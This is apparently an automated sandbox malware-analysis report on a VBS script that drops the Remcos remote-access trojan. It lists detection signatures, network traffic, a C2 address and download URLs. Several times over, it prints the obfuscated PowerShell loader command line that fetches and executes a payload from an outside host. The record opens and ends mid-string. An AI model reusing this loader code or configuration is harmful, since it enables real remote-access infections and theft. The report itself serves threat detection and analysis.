Ge.r U riOut,sJobbtGril]Kr,d=Sjl.$IsolgWi.rrConsoStemuDrftnDiphd Stus');$Cricotus=Relationsdatabasemodellen ' Mid$Vi uYChrooLgnemSodeeD cerFedt.AndeDKardoReimwMichnIndslCharoUdb,a M.cdPreoF

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-19T07:52:55.719199+010028032702Potentially Bad Traffic192.168.2.649820104.21.86.72443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 00000008.00000002.2719001043.0000000000C4C000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["154.216.20.209:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-BNP8PO", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
              Multi AV Scanner detection for submitted file
              Source: Brooming.vbsReversingLabs: Detection: 13%
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000008.00000002.2719001043.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.6% probability
              Source: unknownHTTPS traffic detected: 104.21.86.72:443 -> 192.168.2.6:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.86.72:443 -> 192.168.2.6:49820 version: TLS 1.2
              Source: Binary string: msiexec.pdb source: msiexec.exe, msiexec.exe, 00000008.00000003.2717481925.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, remcos.exe
              Source: Binary string: msiexec.pdbGCTL source: msiexec.exe, 00000008.00000003.2717481925.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2612607332.0000000007E10000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.2244688991.00000263E8771000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2248116940.00000263E8971000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: stem.Core.pdbvs source: powershell.exe, 00000004.00000002.2606853141.0000000006DC2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb52G source: powershell.exe, 00000004.00000002.2606853141.0000000006D81000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000004.00000002.2606853141.0000000006D81000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorIPs: 154.216.20.209
              Source: Joe Sandbox ViewASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo SKHT-ASShenzhenKatherineHengTechnologyInformationCo
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49820 -> 104.21.86.72:443
              Source: global trafficHTTP traffic detected: GET /pnTClIjB/Shotstar.psd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: of1x.icuConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /SPJvBNUT/VgfkXiQUJNREEqCxjfN242.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: of1x.icuCache-Control: no-cache
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /pnTClIjB/Shotstar.psd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: of1x.icuConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /SPJvBNUT/VgfkXiQUJNREEqCxjfN242.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: of1x.icuCache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: of1x.icu
              Source: powershell.exe, 00000004.00000002.2606853141.0000000006CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro(
              Source: powershell.exe, 00000002.00000002.2406245717.0000018221C20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2599993582.0000000005358000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000002.00000002.2373287190.0000018213869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://of1x.icu
              Source: powershell.exe, 00000004.00000002.2584517937.0000000004447000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.2373287190.0000018211BB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2584517937.00000000042F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000004.00000002.2584517937.0000000004447000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000002.00000002.2373287190.0000018211BB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000004.00000002.2584517937.00000000042F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000004.00000002.2599993582.0000000005358000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000004.00000002.2599993582.0000000005358000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000004.00000002.2599993582.0000000005358000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000004.00000002.2584517937.0000000004447000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.2373287190.000001821272F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000002.00000002.2406245717.0000018221C20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2599993582.0000000005358000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.i
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.ic
              Source: powershell.exe, 00000002.00000002.2373287190.000001821351D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2373287190.0000018211DD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/p
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pn
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnT
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnTC
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnTCl
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnTClI
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnTClIj
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnTClIjB
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnTClIjB/
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnTClIjB/S
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnTClIjB/Sh
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnTClIjB/Sho
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnTClIjB/Shot
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnTClIjB/Shots
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnTClIjB/Shotst
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnTClIjB/Shotsta
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnTClIjB/Shotstar
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnTClIjB/Shotstar.
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnTClIjB/Shotstar.p
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnTClIjB/Shotstar.ps
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnTClIjB/Shotstar.psd
              Source: powershell.exe, 00000002.00000002.2373287190.0000018211DD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnTClIjB/Shotstar.psdP
              Source: powershell.exe, 00000004.00000002.2584517937.0000000004447000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnTClIjB/Shotstar.psdXRMl$
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
              Source: unknownHTTPS traffic detected: 104.21.86.72:443 -> 192.168.2.6:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.86.72:443 -> 192.168.2.6:49820 version: TLS 1.2

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000008.00000002.2719001043.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi32_2704.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 3664, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 2704, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Potential malicious VBS script found (suspicious strings)
              Source: Initial file: Call Thionyl.ShellExecute( "p" + Pockmarking,Doctored & Dorsiflex & Doctored ,"","",0)
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}Jump to behavior
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Sarcosome; function Relationsdatabasemodellen($Omgngelsernes){$Skinfulndustrivirksomheden=4;$Skinful=$Skinfulndustrivirksomheden;do{$Klasselotteriets+=$Omgngelsernes[$Skinful];$Skinful+=5} until(!$Omgngelsernes[$Skinful])$Klasselotteriets}function Woodranger($Henequen){ .($Ludgate) ($Henequen)}$Akvavitters3=Relationsdatabasemodellen 'Vif nS miernketBrid. SliW';$Akvavitters3+=Relationsdatabasemodellen 'Styre OveB dspc.eneL SynICaboEAstinConvt';$grounds=Relationsdatabasemodellen 'Sh,mMsammo ,dhz enbiMindl elpltidsa N,n/';$Komitadji=Relationsdatabasemodellen 'KlebT LowlEft sBrie1Albu2';$Parodi='P al[ oseNcapeeEkspTVild.G.noSBoulELic.RTilbvAmasi Sa.cWindeNon,PGenno BariArchnLi nTTinkmLit.akol N BedaSnekgOrchEB,virLina]Rgni:Fors:SupesInfeERorpcT lsUsp nRVen ivurdt unlyLokaP H lrGastOIndht G nOSti cOpdrOStanLC ha=Gibb$ M rkSlarO Liqm surIPo,tTRe,sAPrehdLa.tJRednI';$grounds+=Relationsdatabasemodellen 'Thr.5Logg.,egl0Ung D,se( RekWBasiiSkrinPremd AlloFasewT lbs win Re mN SveThjem Feri1Denu0swit.meda0Di p;Vand ArpW SeliDiskn ,vi6Inst4Efte;P.os Tocxdobb6 Unp4augu; S,o Or fr Pasvluna:Pa,c1Bldt3Hjer1H mr.Cont0Arch)Fire KnacGFlokeCom cAntik taloDose/Sy p2Inde0Varm1Unde0eigh0Apes1Hexa0Foot1Sacc PrefF PutiDi prClume Kv fStado pylxChil/Fjer1Germ3Unti1Slad.Locu0';$Sinecurist=Relationsdatabasemodellen 'Hemmu M,nsTurkEBio r Per-RetrAT.trgFluoEAn,iNUbnht';$statsretten=Relationsdatabasemodellen 'SpathHjadt pstt AerpskolsUdbo: Fin/ Myt/M veoBetofTurr1Ch oxK ll.GodpiUnjucjouruconr/GoblpSyndnT.ksTA atC Ep.lVaniIJudejschaBSpir/DepeS dowh ineoDecitMartsUniotAnhoaRetrrV nd.Achep Tits ,osd';$Bentjs=Relationsdatabasemodellen 'vilj>';$Ludgate=Relationsdatabasemodellen 'F eeiKo,bEEnk X';$Anticiperede='Filtercigarets';$Gushy='\Knapmagerens.Stu';Woodranger (Relationsdatabasemodellen 'Hyp $FestgUsynL CowOPhasbEr dA DeplBegy:M niBI.niNLystd orpsUncoLLazyeA leTFrejSPibe=Cut.$PjasE uinAlleVAd n:Afsia OliPNavlpO toDJam.aDrjdT derA,ree+T.ea$RenrGBilbUU frS G.khmosey');Woodranger (Relationsdatabasemodellen ' Vil$ Glagh nllDeltoRetrBQuohaBarbLBrn.:ConcMMisaY prASdfilPe.ogPaddiTypecInfr=Ferr$AbiusMarmTSnebaAfruTConcS TekRPlaneHaret port utoe nkNU ie.Depus,nviPOleslPap IHoltTDeal(Exos$Co cB.iogECoornEtt.TSul J SlesItem)');Woodranger (Relationsdatabasemodellen $Parodi);$statsretten=$Myalgic[0];$Pyemesis=(Relationsdatabasemodellen 'Draa$GeckGCo tL garOEf eBFor.AFluil nfa:ReseY Kv oBrugmBioleSkriRPerc=BrugNFif EHalswFors- acOFossBStlgJudvaeNistcCanaTUgen Hov,SDa,ay CansHandTs ineMereM Sce. Nat$,nveAR,inK T.lVDaniaulveVCiseITrkuTC,ndt rygE UndRLavaS Equ3');Woodranger ($Pyemesis);Woodranger (Relationsdatabasemodellen ' omr$Sl pY ,ilos,pem rabeOmplrIrri.Mys HAnace R da JindCouneVentrForvs sek[Duel$UnsuSGaariFordnDok eHjrncprobu Ge.r U riOut,sJobbtGril]Kr,d=Sjl.$IsolgWi.rrConsoStemuDrftnDiphd Stus');$Cricotus=Relationsdatabasemodellen ' Mid$Vi uYChrooLgnemSodeeD cer
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Sarcosome; function Relationsdatabasemodellen($Omgngelsernes){$Skinfulndustrivirksomheden=4;$Skinful=$Skinfulndustrivirksomheden;do{$Klasselotteriets+=$Omgngelsernes[$Skinful];$Skinful+=5} until(!$Omgngelsernes[$Skinful])$Klasselotteriets}function Woodranger($Henequen){ .($Ludgate) ($Henequen)}$Akvavitters3=Relationsdatabasemodellen 'Vif nS miernketBrid. SliW';$Akvavitters3+=Relationsdatabasemodellen 'Styre OveB dspc.eneL SynICaboEAstinConvt';$grounds=Relationsdatabasemodellen 'Sh,mMsammo ,dhz enbiMindl elpltidsa N,n/';$Komitadji=Relationsdatabasemodellen 'KlebT LowlEft sBrie1Albu2';$Parodi='P al[ oseNcapeeEkspTVild.G.noSBoulELic.RTilbvAmasi Sa.cWindeNon,PGenno BariArchnLi nTTinkmLit.akol N BedaSnekgOrchEB,virLina]Rgni:Fors:SupesInfeERorpcT lsUsp nRVen ivurdt unlyLokaP H lrGastOIndht G nOSti cOpdrOStanLC ha=Gibb$ M rkSlarO Liqm surIPo,tTRe,sAPrehdLa.tJRednI';$grounds+=Relationsdatabasemodellen 'Thr.5Logg.,egl0Ung D,se( RekWBasiiSkrinPremd AlloFasewT lbs win Re mN SveThjem Feri1Denu0swit.meda0Di p;Vand ArpW SeliDiskn ,vi6Inst4Efte;P.os Tocxdobb6 Unp4augu; S,o Or fr Pasvluna:Pa,c1Bldt3Hjer1H mr.Cont0Arch)Fire KnacGFlokeCom cAntik taloDose/Sy p2Inde0Varm1Unde0eigh0Apes1Hexa0Foot1Sacc PrefF PutiDi prClume Kv fStado pylxChil/Fjer1Germ3Unti1Slad.Locu0';$Sinecurist=Relationsdatabasemodellen 'Hemmu M,nsTurkEBio r Per-RetrAT.trgFluoEAn,iNUbnht';$statsretten=Relationsdatabasemodellen 'SpathHjadt pstt AerpskolsUdbo: Fin/ Myt/M veoBetofTurr1Ch oxK ll.GodpiUnjucjouruconr/GoblpSyndnT.ksTA atC Ep.lVaniIJudejschaBSpir/DepeS dowh ineoDecitMartsUniotAnhoaRetrrV nd.Achep Tits ,osd';$Bentjs=Relationsdatabasemodellen 'vilj>';$Ludgate=Relationsdatabasemodellen 'F eeiKo,bEEnk X';$Anticiperede='Filtercigarets';$Gushy='\Knapmagerens.Stu';Woodranger (Relationsdatabasemodellen 'Hyp $FestgUsynL CowOPhasbEr dA DeplBegy:M niBI.niNLystd orpsUncoLLazyeA leTFrejSPibe=Cut.$PjasE uinAlleVAd n:Afsia OliPNavlpO toDJam.aDrjdT derA,ree+T.ea$RenrGBilbUU frS G.khmosey');Woodranger (Relationsdatabasemodellen ' Vil$ Glagh nllDeltoRetrBQuohaBarbLBrn.:ConcMMisaY prASdfilPe.ogPaddiTypecInfr=Ferr$AbiusMarmTSnebaAfruTConcS TekRPlaneHaret port utoe nkNU ie.Depus,nviPOleslPap IHoltTDeal(Exos$Co cB.iogECoornEtt.TSul J SlesItem)');Woodranger (Relationsdatabasemodellen $Parodi);$statsretten=$Myalgic[0];$Pyemesis=(Relationsdatabasemodellen 'Draa$GeckGCo tL garOEf eBFor.AFluil nfa:ReseY Kv oBrugmBioleSkriRPerc=BrugNFif EHalswFors- acOFossBStlgJudvaeNistcCanaTUgen Hov,SDa,ay CansHandTs ineMereM Sce. Nat$,nveAR,inK T.lVDaniaulveVCiseITrkuTC,ndt rygE UndRLavaS Equ3');Woodranger ($Pyemesis);Woodranger (Relationsdatabasemodellen ' omr$Sl pY ,ilos,pem rabeOmplrIrri.Mys HAnace R da JindCouneVentrForvs sek[Duel$UnsuSGaariFordnDok eHjrncprobu Ge.r U riOut,sJobbtGril]Kr,d=Sjl.$IsolgWi.rrConsoStemuDrftnDiphd Stus');$Cricotus=Relationsdatabasemodellen ' Mid$Vi uYChrooLgnemSodeeD cerJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 10_2_003863E3 GetVersionExW,GetCurrentProcess,NtQueryInformationProcess,GetCommandLineW,GetStdHandle,GetFileType,memset,memset,RegQueryValueExW,RegCloseKey,RegQueryValueExW,RegCloseKey,CompareStringW,CompareStringW,CompareStringW,memset,GlobalFree,lstrlenW,GlobalFree,CoInitialize,CoRegisterClassObject,GetCurrentThread,OpenThreadToken,GetLastError,OpenEventW,WaitForSingleObject,CloseHandle,RevertToSelf,RegCloseKey,RegEnumKeyW,RevertToSelf,GetCurrentProcess,OpenProcessToken,GetTokenInformation,EqualSid,CloseHandle,GetLastError,memset,CloseHandle,MakeAbsoluteSD,GetLastError,CloseHandle,CloseHandle,CreateEventW,CloseHandle,CreateEventW,CloseHandle,GetLastError,CloseHandle,CloseHandle,CloseHandle,OpenProcess,CloseHandle,GetLastError,CloseHandle,CloseHandle,CloseHandle,OpenProcess,TranslateMessage,DispatchMessageW,PeekMessageW,MsgWaitForMultipleObjects,CloseHandle,GetLastError,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,CloseHandle,CloseHandle,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,CoRevokeClassObject,CoUninitialize,GetLastError,GetMessageW,TranslateMessage,DispatchMessageW,10_2_003863E3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3464B8C22_2_00007FFD3464B8C2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3464AB132_2_00007FFD3464AB13
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3464C4A02_2_00007FFD3464C4A0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3464363D2_2_00007FFD3464363D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34643A352_2_00007FFD34643A35
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0278E9284_2_0278E928
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0278F1F84_2_0278F1F8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0278E5E04_2_0278E5E0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0278192D4_2_0278192D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_3_00CBC0738_3_00CBC073
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_3_00CC3E0D8_3_00CC3E0D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_3_00CC3BE38_3_00CC3BE3
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_3_00CC35BD8_3_00CC35BD
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_3_00CC3D498_3_00CC3D49
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 10_2_003863E310_2_003863E3
              Source: Brooming.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5893
              Source: unknownProcess created: Commandline size = 5893
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5893Jump to behavior
              Source: amsi32_2704.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 3664, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 2704, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@12/8@1/2
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 10_2_00382F93 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,10_2_00382F93
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 10_2_00387DD0 StartServiceCtrlDispatcherW,GetLastError,10_2_00387DD0
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 10_2_00387DD0 StartServiceCtrlDispatcherW,GetLastError,10_2_00387DD0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Knapmagerens.StuJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-BNP8PO
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4824:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_haiygd0u.zhj.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Brooming.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3664
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2704
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Brooming.vbsReversingLabs: Detection: 13%
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Brooming.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Sarcosome; function Relationsdatabasemodellen($Omgngelsernes){$Skinfulndustrivirksomheden=4;$Skinful=$Skinfulndustrivirksomheden;do{$Klasselotteriets+=$Omgngelsernes[$Skinful];$Skinful+=5} until(!$Omgngelsernes[$Skinful])$Klasselotteriets}function Woodranger($Henequen){ .($Ludgate) ($Henequen)}$Akvavitters3=Relationsdatabasemodellen 'Vif nS miernketBrid. SliW';$Akvavitters3+=Relationsdatabasemodellen 'Styre OveB dspc.eneL SynICaboEAstinConvt';$grounds=Relationsdatabasemodellen 'Sh,mMsammo ,dhz enbiMindl elpltidsa N,n/';$Komitadji=Relationsdatabasemodellen 'KlebT LowlEft sBrie1Albu2';$Parodi='P al[ oseNcapeeEkspTVild.G.noSBoulELic.RTilbvAmasi Sa.cWindeNon,PGenno BariArchnLi nTTinkmLit.akol N BedaSnekgOrchEB,virLina]Rgni:Fors:SupesInfeERorpcT lsUsp nRVen ivurdt unlyLokaP H lrGastOIndht G nOSti cOpdrOStanLC ha=Gibb$ M rkSlarO Liqm surIPo,tTRe,sAPrehdLa.tJRednI';$grounds+=Relationsdatabasemodellen 'Thr.5Logg.,egl0Ung D,se( RekWBasiiSkrinPremd 